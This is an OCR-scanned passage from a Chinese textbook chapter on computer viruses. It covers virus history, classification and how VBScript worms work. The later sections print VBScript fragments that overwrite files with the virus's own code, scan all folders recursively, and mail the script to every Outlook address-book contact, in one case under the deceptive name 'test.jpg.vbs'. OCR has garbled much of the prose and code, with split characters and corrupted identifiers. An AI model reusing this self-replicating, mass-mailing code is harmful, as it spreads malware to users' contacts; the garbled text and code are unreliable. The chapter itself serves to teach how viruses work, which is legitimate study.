病毒 越 来 越 多 的 使 用 这 种 功能 来 对 抗 安装 在 硬盘 上 的 抗 病毒 软件 ,但 用 无 病毒 系统 软盘 引 
导 机 器 后 ,病毒 就 会 失去 “ 反 转 ?功能 。 

而 1345、1820、PCTCOPY-2000 等 病毒 则 直接 隐藏 在 command. com 文件 中 的 空闲 
(0 代码) 部 位 ,从 外 表 上 看 ,文件 一 个 字 节 也 没 增加 。 

INT60(0002) 病 毒 隐藏 的 更 加 神秘 , 它 不 修改 主 引导 记录 ,只 将 硬盘 分 区 表 修改 两 个 字 
节 , 使 那些 只 检查 主 引导 记录 的 程序 认为 完全 正常 ,病毒 主体 却 隐 藏 在 这 两 个 字 节 指向 的 区 
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域 。 硬 盘 引导 时 ,ROM-BIOS 程序 糊 里 糊涂 的 按 这 两 个 字 节 的 引 向 ,将 病毒 激活 。 

Monkey( 猴 子 ) .PC_LOCK( 加 密 锁 ) 等 病毒 将 硬盘 分 区 表 加 密 后 再 隐藏 起 来 ,如 果 将 
硬盘 主 引导 记录 更 换 或 用 FDisk/MBR 格式 轻易 将 硬盘 主 引导 记录 更 换 , 那 么 用 户 无 法 进 
和 人 硬盘 了 ,所 以 不 能 轻易 使 用 FDisk/MBR 格式 。 

1992 年 以 来 ,DIR2-3、DIR2-6、NEW DIR2 等 病毒 以 一 种 全 新 的 面貌 出 现 , 具 有 感染 力 
极 强 、 无 任何 表现 ,不 修改 中 断 向 量 表 而 直接 修改 系统 关键 中 断 的 内 核 , 修 改 可 执行 文件 的 
首 簇 数 和 将 文件 名 字 与 文件 代码 主体 分 离 等 特性 。 在 系统 感染 了 病毒 的 情况 下 ,一 切 就 像 
没 发 生 一 样 。 当 用 户 用 无 病毒 的 文件 去 覆盖 有 病毒 的 文件 时 ,灾难 就 会 发 生 , 全 盘 所 有 被 感 
染 的 可 执行 文件 内 容 都 是 刚 覆盖 进去 的 文件 内 容 。 这 是 病毒 “我 死 用 户 也 活 不 成 ”的 罪恶 
伎俩 。 

20 世纪 , 绝 大 多 数 病毒 是 基于 DOS 系统 的 ,有 80% 的 病毒 能 在 Windows 系统 中 传染 。 
TPVO/3783 病毒 是 “双料 性 (传染 引导 区 .文件 )”“ 双 重 性 (DOS、Windows)” 病 毒 ,这 是 病 
毒 随 着 操作 系统 发 展 而 发 展 的 结果 。 当 然 ,由 于 Internet 的 广泛 应 用 ,Java 恶意 代码 病毒 也 
出 现 了 。 

脚本 病毒 HappyTime( 快 乐 时 光 ) 是 一 种 传染 能 力 非 常 强 的 病毒 。 该 病毒 利用 体内 
VBScript 代码 的 本 地 可 执行 性 (通过 Windows Script Host 进行 ) ,对 当前 计算 机 进行 感染 
和 破坏 。 一 旦 用 户 将 鼠标 指针 移 到 带 有 “快乐 时 光 ” 病 毒 体 的 邮件 名 上 时 ,不 必 打 开 信 件 ,就 
会 受到 “快乐 时 光 ” 病 毒 的 感染 。 

近 几 年 ,出 现 了 近 万 种 Word(MACRO 宏 ) 病 毒 ,并 以 迅猛 的 势头 发 展 ,已 形成 了 病毒 
的 另 一 大 派系 。 由 于 宏 病 毒 编写 容易 ,再 加 上 人 们 在 互联 网 上 用 Word 格式 文件 进行 大 量 
的 交流 , 宏 病 毒 就 潜伏 在 这 些 Word 文件 里 ,在 互联 网 上 被 人 们 传 来 传 去 。 

早 在 1995 年 时 ,就 出 现 了 一 个 危险 的 信号 ,在 对 众多 的 病毒 剖析 中 ,人 们 发 现 部 分 病毒 
好 像 出 于 一 个 家 族 ,其 “遗传 基因 ”相同 ,简单 地 说 ,是 “同族 ”病毒 。 而 并 不 是 简单 地 修改 部 
分 代码 而 产生 的 “ 改 形 ” 病 毒 。 

“ 改 形 " 病 毒 与 “ 原 种 ”病毒 的 代码 长 度 相 差 不 大 ,大 多 数 代码 与 * 原 种 ”的 代码 相同 ,并 且 
相同 的 代码 其 位 置 也 相同 。 否 则 就 是 一 种 新 的 病毒 。 大 量具 有 相同 “遗传 基因 ”的 “同族 ” 病 
毒 的 涌现 ,使 人 们 不 得 不 怀疑 "病毒 生产 机 ”软件 已 出 现 。1996 年 下 半年 在 国内 发 现 了 G2、 
IVP、VCL 三 种 病毒 生产 机 软件 ,不 法 之 徒 可 以 用 它 来 编 出 成 千 上 万 种 新 病毒 。 目 前 网 络 
上 已 经 存在 上 百 种 病毒 生产 机 软件 。 

这 种 病毒 生产 机 软件 不 用 绞 尽 脑汁 地 去 编程 序 , 便 会 轻易 地 自动 生产 出 大 量 的 “ 同 
族 ” 新 病毒 。 这 些 病 毒 代 码 长 度 各 不 相同 ,自我 加 密 、 解 密 的 密 钥 也 不 相同 ,原文 件 头 重 
要 参数 的 保存 地 址 不 同 ,病毒 的 发 作 条 件 和 现象 不 同 ,但 是 ,这 些 病 毒 的 主体 构造 和 原理 
基本 相同 。 

病毒 生产 机 软件 有 专门 能 生产 变形 病毒 的 ,有 专门 能 生产 普通 病毒 的 。 目 前 ,国内 发 现 
的 有 部 分 变形 能 力 的 病毒 生产 机 有 G2、IVP、VCL 等 十 几 种 。 具 备 变形 能 力 的 有 CLME、 
DAME-SP/MTE 等 病毒 生产 机 。 它 们 生产 的 病毒 都 有 “遗传 基因 ”相同 的 特点 ,大 部 分 抗 
病毒 软件 只 能 是 知道 一 种 查 一 种 ,难于 解除 病毒 生产 机 生产 出 的 大 量 新 病毒 。 

香港 地 区 也 有 人 模仿 欧美 的 Mutation Eneine (变形 金刚 病毒 生产 机 ) 软件 编写 出 
CLME(Crazy Lord Mutation Eneine) 。 即 疯狂 贵族 变形 金刚 病毒 生产 机 ,已 出 现 了 数 种 变 
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形 病 毒 ,其 中 一 种 名 为 CLME. 1528。 中 国 大 陆地 区 也 发 现 了 名 为 CLME. 1996、DAME- 
SP/MTE 的 病毒 。 


5.2 病毒 的 定义 及 分 类 


网 络 上 传播 着 很 多 的 病毒 ,只 要 是 危害 了 用 户 计算 机 的 程序 ,用 户 都 可 以 称 之 为 “ 病 
毒 ”。 在 本 节 中 将 按 病 毒 感染 的 对 象 .病毒 的 破坏 程度 ,以 及 病毒 的 入 侵 方式 对 病毒 进行 分 
类 ,让 读者 更 清晰 地 了 解 病毒 的 特性 。 


52.1 病毒 的 定义 


计算 机 病毒 是 一 个 程序 ,一 段 可 执行 码 。 就 像 某 些 生 物 一 样 ,计算 机 病毒 有 独特 的 复制 
能 力 。 计 算 机 病毒 可 以 快速 地 传染 ,并 很 难 解除 。 它 们 把 自身 附着 在 各 种 类 型 的 文件 上 。 
当 文件 被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,病毒 就 随 着 文件 一 起 被 传播 了 。 

一 般 可 以 从 下 面 几 个 方面 给 出 计算 机 病毒 的 定义 。 一 种 是 : 通过 磁盘 、 磁 带 和 网 络 等 
作为 媒介 传播 扩散 ,能 “传染 "其 他 程序 的 程序 。 另 一 种 是 : 能 够 实现 自身 复制 且 借 助 一 定 
的 载体 存在 的 ,具有 潜伏 性 、 传 染 性 和 破坏 性 的 程序 等 。 还 有 一 种 是 : 一 种 人 为 制造 的 程 
序 , 它 通 过 不 同 的 途径 潜伏 或 寄生 在 存储 媒体 (如 磁盘 、 内 存 ) 或 程序 里 , 当 某 种 条 件 或 时 机 
成 熟 时 , 它 会 自生 复制 并 传播 ,使 计算 机 的 资源 受到 不 同 程度 的 破坏 等 。 这 些 说 法 在 某 种 意 
义 上 借用 了 生物 学 病毒 的 概念 ,计算 机 病毒 同 生物 病毒 所 相似 之 处 是 能 够 攻击 计算 机 系统 
和 网 络 , 危 害 正 常 工作 的 “病原 体 "。 它 能 够 对 计算 机 体 统 进行 各 种 破坏 ,同时 能 够 自我 复 
制 ,具有 传染 性 。 

计算 机 病毒 确切 定义 是 能 够 通过 某 种 途径 潜伏 在 计算 机 存储 介质 (或 程序 ) 里 , 当 达 到 
某 种 条 件 时 即 被 激活 具有 对 计算 机 资源 进行 破坏 的 一 组 程序 或 指令 的 集合 。 


522 病毒 的 分 类 


病毒 的 种 类 很 多 ,可 以 按 一 定 的 原则 进行 分 类 。 下 面 分 别 按 病毒 的 感染 对 象 , 病 毒 的 破 
坏 程 度 、 病 毒 的 攻击 方式 三 个 方面 进行 曾 述 。 


1. 按 病 毒 感染 的 对 象 


(1) 引导 型 病毒 

这 类 病毒 攻击 的 对 象 是 磁盘 的 引导 扇 区 ,在 系统 启动 时 获得 优先 的 执行 权 , 从 而 达到 控 
制 整个 系统 的 目的 。 这 类 病毒 因为 感染 的 是 引导 扇 区 ,所 以 造成 的 损失 也 就 比较 大 ,一般 来 
说 会 造成 系统 无 法 正常 启动 ,但 查 杀 这 类 病毒 也 较 容 易 , 多 数 抗 病毒 软件 都 能 查 杀 这 类 病 
毒 ,如 KV300、KILL 系列 等 。 

(2) 文件 型 病毒 

早期 的 这 类 病毒 一 般 是 感染 以 . exe、. com 等 为 扩展 名 的 可 执行 文件 , 当 用 户 执行 某 个 
可 执行 文件 时 病毒 程序 就 被 激活 。 近 期 也 有 一 些 病毒 感染 以 . dll、. ovl、. sys 等 为 扩展 名 的 
文件 ,因为 这 些 文件 通常 是 某 程序 的 配置 或 链接 文件 ,所 以 执行 某 程序 时 病毒 也 就 被 激活 
了 。 它 们 加 载 的 方法 是 通过 将 病毒 代码 整 段 落 插入 或 分 散 搬入 到 这 些 文件 的 空白 字 节 中 
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(如 CIH 病毒 就 是 把 自己 拆 分 成 9 段 ) ,嵌入 到 PE 结构 的 可 执行 文件 中 ,通常 感染 后 的 文件 
的 字 节 数 并 不 增加 。 

(3) 网 络 型 病毒 

这 种 病毒 是 近 几 年 来 网 络 的 高 速 发 展 的 产物 ,感染 的 对 象 不 再 局 限于 单一 的 模式 和 单 
一 的 可 执行 文件 ,而 是 更 加 综合 .更 加 隐蔽 。 现 在 某 些 网 络 型 病毒 可 以 对 几乎 所 有 的 Office 
文件 进行 感染 ,如 Word、Excel、 电 子 邮 件 等 。 其 攻击 方式 也 有 转变 ,从 原始 的 删除 、 修 改 文 
件 到 现在 进行 文件 加 密 、 窃 取 用 户 有 用 信息 (如 黑客 程序 ) 等 。 传 播 的 途径 也 发 生 了 质 的 飞 
跃 , 不 再 局 限于 磁盘 ,而 是 多 种 方式 进行 ,如 电子 邮件 .电子 广告 等 。 

(4) 复合 型 病毒 

复合 型 病毒 同时 具备 了 “引导 型 "和 “文件 型 "病毒 的 某 些 特点 ,它们 即 可 以 感染 磁盘 的 
引导 扇 区 文件 ,又 可 以 感染 某 些 可 执行 文件 ,如 果 没 有 对 这 类 病毒 进行 全 面 的 解除 , 则 残留 
病毒 可 自我 恢复 ,所 以 这 类 病毒 查 杀 难 度 极 大 ,所 用 的 抗 病毒 软件 要 同时 具备 查 杀 两 类 病毒 
的 功能 。 


2. 按 病毒 的 破坏 程度 


(1) 良性 病毒 

它们 入 侵 的 目的 不 是 破坏 用 户 的 系统 ,只 是 想 玩 一 玩 而 已 ,多 数 是 一 些 初级 病毒 发 烧 友 
想 测 试 一 下 自己 的 开发 病毒 程序 的 水 平 。 它 们 只 是 发 出 某 种 声音 ,或 出 现 一些 提 示 ,除了 占 
用 一 定 的 硬盘 空间 和 CPU 处 理 时 间 外 没有 其 他 破坏 性 。 

(2) 恶性 病毒 

恶性 病毒 会 对 软件 系统 造成 干扰 .窃取 信息 、 修 改 系统 信息 ,不 会 造成 硬件 损坏 .数据 丢 
失 等 严重 后 果 。 这 类 病毒 人 侵 后 系统 除了 不 能 正常 使 用 之 外 ,没有 其 他 损失 ,但 系统 损坏 后 
一 般 需 要 格式 化 引导 盘 并 重 装 系统 ,这 类 病毒 危害 比较 大 。 

(3) 极 恶性 病毒 

这 类 病毒 比 恶 性 病毒 损坏 的 程度 更 大 ,如 果 感 染 上 这 类 病毒 用 户 的 系统 就 要 彻底 崩溃 ， 
用 户 保 存在 硬盘 中 的 数据 也 可 能 被 损坏 。 

(4) 灾难 性 病毒 

这 类 病毒 从 它 的 名 字 就 可 以 知道 它 会 给 用 户 带 来 的 损失 程度 ,这 类 病毒 一 般 是 破坏 磁 
盘 的 引导 扇 区 文件 .修改 文件 分 配 表 和 硬盘 分 区 表 , 造 成 系统 根本 无 法 启动 ,甚至 会 格式 化 
或 锁 死 用 户 的 硬盘 ,使 用 户 无 法 使 用 硬盘 。 一 旦 感染 了 这 类 病毒 ,用 户 的 系统 就 很 难 恢 复 
了 ,保留 在 硬盘 中 的 数据 也 就 很 难 获取 了 ,所 造成 的 损失 是 非常 巨大 的 ,所 以 企业 用 户 应 充 
分 作 好 灾难 性 备份 。 


3. 按 病毒 攻击 的 方式 


(1) 源 代 码 嵌 入 攻击 型 

这 类 病毒 主要 攻击 高 级 语言 的 源 程序 ,病毒 是 在 源 程序 编译 之 前 插入 病毒 代码 , 随 源 程序 
一 起 被 编译 成 可 执行 文件 ,这 样 刚 生成 的 文件 就 是 携带 病毒 的 文件 。 当 然 这 类 文件 是 极 少数 。 

(2) 代码 取代 攻击 型 

这 类 病毒 主要 是 用 它 自身 的 病毒 代码 取代 某 个 程序 的 整个 或 部 分 模块 ,这 类 病毒 也 少 
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见 , 它 主要 是 攻击 特定 的 程序 ,针对 性 较 强 , 但 是 不 易 被 发 现 , 解 除 起 来 也 较 困 难 。 

(3) 系统 修改 型 

这 类 病毒 主要 是 用 自身 程序 覆盖 或 修改 系统 中 的 某 些 文件 来 达到 调用 或 替代 操作 系统 
中 的 部 分 功能 的 目的 ,由 于 是 直接 感染 系统 ,危害 较 大 ,也 是 最 为 常见 的 一 种 病毒 类 型 ,多 为 
文件 型 病毒 。 

(4) 外 壳 附加 型 

这 类 病毒 通常 是 将 其 病毒 附加 在 正常 程序 的 头 部 或 尾部 ,相当 于 给 程序 添加 了 一 个 外 
壳 , 在 被 感染 病毒 的 程序 执行 时 ,病毒 代码 先 被 执行 ,然后 才 将 正常 程序 调和 内存。 目前 大 
多 数 文件 型 的 病毒 属于 这 一 类 型 。 


5.3 VBS 病毒 的 起 源 与 发 展 及 其 危害 


VBS 病毒 是 用 VB Script 编写 而 成 ,利用 Windows 系统 的 开放 性 特点 ,通过 调用 一 些 
现成 的 Windows 对 象 . 组 件 , 可 以 直接 对 文件 系统 .注册 表 等 进行 控制 ,其 脚本 语言 的 功能 
非常 强大 。 由 于 VBS 病毒 编写 非常 简单 ,所 以 VBS 病毒 成 为 Internet 世界 里 最 为 流行 的 
病毒 之 一 。 


53.1 VBS 的 运行 基础 


说 起 VBS 病毒 就 必须 提 到 Microsoft 公司 提供 的 脚本 程序 ; WSHCWindows Scripting 
Host)。WSH 通用 的 中 文 译名 为 "Windows 脚本 宿主 ”。 对 于 这 个 较为 抽象 的 名 词 ,可 以 理 
解 为 : 它 是 内 嵌 于 Windows 操作 系统 中 的 脚本 语言 工作 环境 。 举 例 来 说 : 编写 一 个 脚本 文 
件 ( 如 后 缀 为 . vbs 或 .js 的 文件 ) ,在 Windows 下 执行 它 , 系 统 就 会 自动 调用 一 个 适当 的 程 
序 来 对 它 进行 解释 并 执行 ,而 这 个 程序 就 是 Windows Scripting Host, 程 序 执行 文件 名 为 
Wscript. exe( 若 是 在 命令 行 下 , 则 为 Cscript. exe) 。 

WSH 诞生 后 ,在 Windows 系列 产品 中 很 快 得 到 了 推广 。 除 Windows 98 操作 系统 外 ， 
微软 公司 在 Internet Information Server 4. 0、Windows Me、Windows 2000 Server 以 及 
Windows 2000 Professional 等 产品 中 都 嵌入 了 WSH。 早 期 的 Windows 95 操作 系统 也 可 
单独 安装 相应 版 本 的 WSH。 

WSH 的 设计 ,充分 考虑 了 “ 非 交 互 性 脚本 (Noninteractive Scripting)” 的 需要 。 在 这 一 
指导 思想 下 产生 的 WSH ,给 脚本 带 来 非常 强大 的 功能 ,例如 : 可 以 利用 它 完 成 映射 网 络 驱 
动 器 、 检 索 及 修改 环境 变量 、 处 理 注册 表 等 工作 ; 管理 员 可 以 使 用 WSH 的 支持 功能 来 创建 
简单 的 登录 脚本 ,甚至 可 以 编写 脚本 来 管理 活动 目录 。 

任何 事物 都 有 两 面 性 ,WSH 也 不 例外 。 应 该 说 , WSH 的 优点 在 于 它 使 用 户 可 以 充分 
利用 脚本 来 实现 计算 机 工作 的 自动 化 ; 也 正 是 它 的 这 一 特点 ,使 用 户 的 系统 又 有 了 新 的 安 
全 隐患 。 许 多 计算 机 病毒 制造 者 正在 热衷 于 用 脚本 语言 来 编制 病毒 ,并 利用 WSH 的 支持 
功能 ,让 这 些 隐 藏 着 病毒 的 脚本 在 网 络 中 传播 .“I Love You” 病 毒 便 是 一 个 典型 的 代表 。 


532 VBS 病毒 的 发 展 和 危害 
正 是 有 了 Scripting Host 脚本 的 支持 ,加 上 这 种 脚本 的 编制 大 多 数 是 VB Scripting 和 
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Java Scripting 脚本 语言 ,这 种 脚本 语言 的 学 习 门 槛 很 低 ,编写 程序 相对 容易 ,这 就 造成 了 
VBS 病毒 的 流行 。 

当 Microsoft 公司 在 推出 WHS 后 不 久 , 在 Windows 95 操作 系统 中 就 发 现 了 利用 
WHS 的 病毒 ,随后 又 出 现 了 更 为 厉害 的 “欢乐 时 光 ” 病 毒 ,这 种 病毒 不 断 地 利用 自身 的 复制 
功能 ,把 自身 复制 到 计算 机 内 的 每 一 个 文件 夹 内 。 

而 2000 年 5 月 4 日 在 欧美 地 区 爆发 的 “ 宏 病 毒 " 网 络 蠕虫 病毒 。 由 于 通过 电子 邮件 系 
统 传播 , 宏 病 毒 在 短 短 几 天 内 狂 袭 全 球 数 以 百 万 计 的 计算 机 。 包 括 Microsoft、Intel 等 公司 
在 内 的 众多 大 型 企业 网 络 系统 瘫痪 ,全 球 经 济 损失 达 数 十 亿美 元 。2004 年 爆发 的 “新 欢乐 
时 光 ” 病 毒 也 给 全 球 经 济 造成 了 巨大 损失 。 

由 于 VBS 病毒 的 这 种 特点 ,使 它 的 破坏 性 、 感 染 力 更 强 。VBS 脚本 病毒 直接 调用 
Windows 组 件 , 可 迅速 获得 对 系统 文件 及 注册 表 的 控制 权 , 这 就 使 得 它 一 旦 发 作 , 即 可 造成 
大 的 破坏 。 如 耗费 系统 资源 ,制造 系统 垃圾 、 滥 发 电子 邮件 .阻塞 网 络 等 。 加 之 脚本 是 直接 
解释 执行 的 ,传播 非常 简单 ,电子 邮件 、 局 域 网 共享 ,文件 感染 和 IRC 感染 等 都 是 它 传播 的 
良好 途径 。 另 外 它 的 欺骗 性 强 ,不 易 彻 底 解除 。 编 写 良好 的 VBS 脚本 病毒 本 身 就 很 善于 伪 
装 自己 ,使 得 VBS 脚本 病毒 传播 变 的 隐蔽 和 容易 。 而 且 VBS 脚本 病毒 的 生命 力 十 分 顽强 ， 
使 得 它 被 彻底 解除 具有 一 定 的 难度 。 

最 近 在 网 络 上 还 出 现 了 VBS 病毒 制造 机 ,这 种 病毒 制造 机 能 让 一 个 对 病毒 原理 不 了 解 
的 人 只 需 轻 点 鼠标 ,就 可 以 造 出 威力 惊人 的 计算 机 病毒 ,使 得 VBS 病毒 成 为 具有 随机 性 的 
病毒 ,用 户 对 这 种 病毒 的 防治 更 加 困难 ,这 就 是 为 什么 下 载 的 专 杀 工具 有 时 候 对 已 知 的 病毒 
仍然 无 能 为 力 的 原因 。 


533 VBS 病毒 的 原理 及 其 传播 方式 


VBS 脚本 病毒 一 般 是 直接 通过 自我 复制 来 感染 文件 的 ,病毒 中 的 绝 大 部 分 代码 都 可 以 
直接 附加 在 其 他 同类 程序 的 中 间 , 如 “新 欢乐 时 光 ” 病 毒 可 以 将 自己 的 代码 附加 在 以 . htm 为 
后 级 名 的 文件 尾部 ,并 在 顶部 加 入 一 条 调用 病毒 代码 的 语句 ,而 宏 病毒 则 是 直接 生成 一 个 文 
件 的 副本 ,将 病毒 代码 复制 其 中 ,并 以 原文 件 名 作为 病毒 文件 名 的 前 级 ,. vbs 作为 后 级。 本 
节 通 过 对 宏 病 毒 部 分 代码 的 分 析 使 读者 了 解 这 类 病毒 的 感染 和 搜索 原理 。 


1. VBS 脚本 病毒 如 何 感 染 、 搜 索 文件 


VBS 病毒 中 常见 的 部 分 关键 代码 如 下 : 
// 创 建 一 个 文件 系统 对 象 


Set fso = createobject("scripting. filesystemobject") 
// 读 当前 文件 ( 即 病毒 本 身 ) 

Set self = fso. opentextfile(wscript. scriptfullname,1) 
// 读 取 病 毒 全 部 代码 到 字符 串 变量 VBscopy…… 

VBscopy = self. readall 

// 写 目标 文件 ,准备 写 人 病毒 代码 

Set ap = fso. opentextfile( 目 标 文 件 . path,2,true) 

// 将 病毒 代码 覆盖 目标 文件 


ap. write vbscopy 
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ap. close 

// 得 到 目标 文件 路 径 

Set cop = fso. getfile( 目 标 文件 . path) 

// 创 建 另 外 一 个 病毒 文件 (以 . vbs 为 后 组 ) 
cop. copy( 目 标 文件 .path & ".vbs") 

// 删 除 目标 文件 

目标 文件 . delete(true) 


上 面 描述 了 病毒 文件 感染 正常 文件 的 一 般 步骤 : 首先 将 病毒 自身 代码 赋 给 字符 串 变 量 
VBscopy, 然 后 将 这 个 字符 串 履 盖 到 目标 文件 并 创建 一 个 以 目标 文件 名 为 文件 名 前 缀 、vbs 
为 后 级 的 文件 副本 ,最 后 删除 目标 文件 。 

下 面 分 析 文 件 搜索 代码 ,该 函数 主要 用 来 寻找 满足 条 件 的 文件 ,并 生成 对 应 文件 的 一 个 
病毒 副本 。 

//scan 函数 定义 

Sub scan(folder_) 

// 如 果 出 现 错误 ,直接 跳 过 ,防止 弹出 错误 窗口 

On error resume next 


Set folder_= fso.getfolder(folder ) 


// 当 前 目录 的 所 有 文件 集合 
Set files = folder_ .files 


// 获 取 文 件 后 级 

For Each file in filesext = fso. GetExtensionName(file) 

// 后 缀 名 转换 成 小 写字 母 

ext = lcase(ext) 

// 如 果 后 缀 名 是 mp5, 则 进行 感染 。 

If ext = "mp5" Then 

建立 相应 后 级 名 的 文件 ,最 好 是 非 正 常 后 级 名 ,以 免 破 坏 正常 程序 。 
Wscript. echo (file) 

// 搜 索 其 他 目录 ; 递归 调用 

End ifnextset subfolders = folder_. subfoldersfor each subfolder in subfolders 
scan() scan(subfolder) 

Next 

End Sub 


上 面 的 代码 就 是 VBS 脚本 病毒 进行 文件 搜索 的 代码 分 析 。 搜 索 部 分 scan() 函数 做 得 
短小 精 悍 ,非常 巧妙 ,采用 了 一 个 递归 的 算法 遍历 整个 分 区 的 目录 和 文件 。 


2. VBS 脚本 病毒 通过 网 络 传播 的 几 种 方式 及 代码 分 析 


VBS 脚本 病毒 之 所 以 传播 范围 广 ,主要 依赖 于 它 的 网 络 传播 功能 ,一 般 来 说 ,VBS 脚本 
病毒 采用 如 下 两 种 传播 方式 。 

(1) 通过 E-mail 附件 传播 

这 是 广泛 的 传播 方式 ,病毒 可 以 通过 各 种 方法 拿 到 合法 的 E-mail 地 址 ,最 常见 的 就 是 
直接 获取 Outlook 地 址 短 中 的 邮件 地 址 ,也 可 以 通过 程序 在 用 户 文档 (如 HTML 文件 ) 中 
搜索 E-mail 地 址 。 
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下 面 分 析 VBS 病毒 是 如 何 做 到 这 一 点 的 。 


Function mailBroadcast() 

on error resume next 

wscript. echo 

Set outlookApp = CreateObject("OQutlook. Application") 
// 创 建 一 个 0utlook 应 用 的 对 象 

If outlookApp = "Outlook" Then 

Set mapiO0bj = outlookApp. GetNameSpace( "MAPI") 

// 获 取 MAPI 的 名 字 空 间 

Set addrList = mapiObj. AddressLists 

// 获 取 地 址 表 的 个 数 

For Each addr In addrList 

If addr. AddressEntries. Count 一 二 0 Then 

addrEntCount = addr.RddressEntries. Count 

// 获 取 每 个 地 址 表 的 E-mail 记录 数 

For addrEntIndex = 1 To addrEntCount 

// 遍 历 地 址 表 的 E-mail 地 址 

Set item = outlookApp. CreateItem(0) 

// 获 取 一 个 邮件 对 象 实例 

Set addrEnt = addr.AddressEntries(addrEntIndex) 
// 获 取 具 体 E-mail 地 址 

item. To = addrEnt. Rddress 

// 填 入 收 信人 地 址 

item. Subject = "病毒 传播 实验 " 

// 写 入 E-mail 标题 

item. Body = "这 里 是 病毒 邮件 传播 测试 , 收 到 此 信 请 不 要 慌张 !" 
// 写 人 文件 内 容 

Set attachMents = item. Attachments 

// 定 义 E- mail 附件 

attachMents. Add fileSysObj. GetSpecialFolder(0)&"\test. jpg. vbs" 
item. DeleteAfterSubmit = True 

// 信 件 提交 后 自动 删除 

If item. To<>"" Then 

item. Send 

// 发 送 E-mail 

shell0bj. regwrite "HKCU\software\Mailtest\mailed","1" 
// 病 毒 标 记 , 以 免 重 复 感染 

End If 

NextEnd IfNext 

End if 

End Function 


(2) 通过 局 域 网 共享 传播 


局 域 网 共享 传播 也 是 病毒 经 常 使 用 的 一 种 网 络 传播 方式 。 病 毒 通过 搜索 局 域 网 中 的 共 
享 目录 ,就 可 以 将 病毒 代码 传播 进去 。 在 VBS 中 ,有 一 个 对 象 可 以 实现 网 上 邻居 共享 文件 
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夹 的 搜索 与 文件 操作 。 病 毒 利用 该 对 象 就 可 以 达到 传播 的 目的 。 创 建 网 络 对 象 的 具体 代码 
如 下 。 


Welcome_msg = "网 络 连接 搜索 测试 ” 
Set WSHNetwork = WScript.CreateObject("WScript.Network") // 创 建 一 个 网 络 对 象 


s.4 共享 蠕虫 的 原理 及 用 VB 编程 的 实现 方法 


所 谓 的 共享 蠕虫 的 病毒 (network. vbs) ,不 但 小 巧 ( 只 有 1KB) ,而 且 具 有 很 强 的 破坏 
性 。 被 感染 了 这 个 病毒 的 机 器 ,所 有 的 硬盘 都 会 被 完全 共享 。 


541 了 解 蠕虫 病毒 


网 络 蠕虫 病毒 最 有 名 的 代表 包括 :“ 爱 虫 "“ 欢 乐 时 光 ” 以 及 “红色 代码 ”, 破 坏 力 越 来 越 
强 , 有 必要 了 解 网 络 蠕虫 病毒 。 

大 多 数 情况 下 ,人 们 容易 把 蠕虫 病毒 和 VBS 病毒 相 混 淆 ,其 实 它们 分 别 代 表 了 一 类 病 
毒 ,蠕虫 病毒 主要 体现 了 病毒 的 一 种 攻击 方式 ,而 VBS 病毒 则 体现 了 病毒 的 一 种 编写 方式 。 
实际 情况 中 ,很 多 蠕虫 病毒 也 是 用 脚本 语言 (如 VBS) 编 写 的 。 

其 实 脚本 病毒 是 很 容易 制造 的 ,它们 都 利用 了 视窗 系统 的 开放 性 的 特点 。 特 别 是 COM 
到 COM 十 的 组 件 编程 思路 ,一 个 脚本 程序 能 调用 功能 更 大 的 组 件 来 完成 自己 的 功能 。 例 如 
VB 脚本 病毒 (如 “欢乐 时 光 ”、“I Love You”“ 库 尔 尼 科 娃 ?病毒 和 Homepage 病毒 等 ) ,它们 
都 是 把 . vbs 脚本 文件 添 在 附件 中 ,最 后 使 用 * . htm. vbs 等 欺骗 性 的 文件 名 。 本 节 将 详细 
介绍 一 下 蠕虫 病毒 的 几 大 特性 。 


1. 蠕虫 病毒 具有 自我 复制 能 力 


以 普通 的 VB 脚本 为 例 。 


// 创 建 一 个 文件 系统 对 象 

Set objFs = CreateObject ("Scripting. FileSystemObject") 
// 通 过 文件 系统 对 象 的 方法 创建 了 一 个 .txt 文件 

objFs. CreateTextFile("C:\virus. txt" ,1) 


如 果 把 这 两 名 话 保存 成 为 . vbs 的 VB 脚本 文件 ,点击 脚本 文件 就 会 在 C 盘 中 创建 一 个 
.txt 文件 了 。 倘 若 把 第 二 句 改 为 : objFs. GetFile(WScript. ScriptFullName). Copy("C:\ 
virus. vbs") ,脚本 文件 就 可 以 将 自身 复制 到 C 盘 根 目 录 下 virus. vbs 文件 中 。 本 句 前 面 是 
打开 这 个 脚本 文件 ,WScript，ScriptFullName 指明 是 这 个 程序 本 身 , 是 一 个 完整 的 路 径 文 
件 名 。GetFile 函数 获得 这 个 文件 ,Copy 函数 将 这 个 文件 复制 到 C 盘 根 目录 下 virus. vbs 文 
件 中 。 这 么 简单 的 两 行 代 码 就 实现 了 程序 的 自我 复制 的 功能 ,这 个 简单 的 脚本 已 经 具备 病 
毒 的 基本 特征 一 一 自我 复制 能 力 。 


2. 蠕虫 病毒 具有 很 强 的 传播 性 
对 于 Outlook 来 说 地 址 德 的 功能 也 为 病毒 的 传播 打开 了 方便 之 门 。 几 乎 所 有 通过 
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Outlook 传播 的 E-mail 病毒 都 是 向 地 址 短 中 存储 的 E-mail 地 址 发 送 内 容 相同 的 脚本 附件 
完成 的 。 示 例 代码 如 下 。 


// 创 建 一 个 0utlook 应 用 的 对 象 

Set objOA = Wscript. CreateObject("Outlook. Application") 
// 取 得 MAPI 名 字 空 间 

Set objMapi = objOA. GetNameSpace( "MAPI") 

// 遍 历 地 址 簿 

For i=1 to objMapi. AddressLists. Count 

Set objAddList = objMapi. AddressLists(i) 

For j=1 To objAddList. AddressEntries.Count 

Set objMail = objOA. CreateItem(0) 

// 取 得 收 件 人 E-mail 地 址 

objMail,. Recipients, Add(objAddList. AddressEntries(j)) 
// 设 置 E- mail 主题 

objMail. Subject = "用 户 好 !1" 

// 设 置信 件 内 容 

objMail. Body = "这 次 给 用 户 的 附件 ,是 我 的 新 文档 1" 
// 把 自己 作为 附件 扩散 出 去 

objMail. Attachments. Add("C:\virus. vbs") 

// 发 送 E- mail 

objMail. Send 

Next 

Next 

// 清 空 objMapi 变量 ,释放 资源 

Set objMapi = Nothing 

// 清 空 objoa 变量 

Set objOA = Nothing 


这 段 代码 的 功能 是 向 地 址 德 中 的 用 户 发 送 E-mail, 并 将 自身 作为 附件 传播 出 去 。 代 码 
的 第 一 行 创建 了 一 个 Outlook 的 对 象 ,这 是 必 不 可 少 的 。 下 面 的 循环 不 断 地 向 地 址 短 中 的 
E-mail 地 址 发 送 内 容 相同 的 信件 。 蠕 虫 病毒 通常 就 是 这 样 进 行 传播 的 。 


3. 蠕虫 病毒 具有 一 定 的 潜伏 性 


